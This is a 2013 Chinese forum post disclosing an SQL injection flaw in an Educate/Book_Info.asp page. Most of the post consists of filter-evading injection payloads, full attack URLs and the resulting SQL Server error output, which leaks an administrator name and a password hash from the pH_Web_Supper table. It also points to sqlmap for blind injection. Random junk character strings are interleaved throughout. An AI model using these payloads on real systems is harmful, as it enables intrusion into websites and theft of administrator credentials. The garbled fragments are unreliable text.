漏洞出现在Educate/Book_Info.asp 4 e/ d" a# Z: I3 O/ ^
- _9 [; @8 y9 r/ ~; h* g6 Z% s; Y此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出) n3 w7 |) n" p" P
( `% ~! y& \! Y. N# dexp:如下3 [& G6 ]+ R! ` J0 H1 e# n
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
' D. E8 Q- v' R- R" F5 r查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)9 v8 q) |4 j) \* k; F5 J$ i3 S
% o: H q" A3 w7 Z9 C) Q6 f: }3 y ~http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper), q, L& O: D- e' h- T
9 p z& D5 I" X/ p. k
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'( {+ d% g4 d' t% F0 R% _
* J+ j3 K* _; ~1 q将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
. _8 T/ @9 L+ Q# N7 t3 j8 x8 u
" \/ W1 \1 l% x' P/Educate/Book_Info.asp,行 8
6 J( n! n2 p7 c; r6 P 0 [5 u9 y' ?6 p/ |/ h1 ]( M/ }
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)* p5 h- P! u: o1 A4 I+ m
" _/ c' N# W u$ D& e" s; B
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; M- r5 L {, H6 O: ~3 n! s% p
2 s5 ?- c$ m8 k& _& S* Y/ J3 z将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。7 P7 n3 B* `' B% {/ a/ F; L: P
8 w" q# y! v7 f9 j5 P& p/Educate/Book_Info.asp,行 8
' C' ]- m# z! x' t |
发表于 2013-2-16 21:44:16
收藏
支持
反对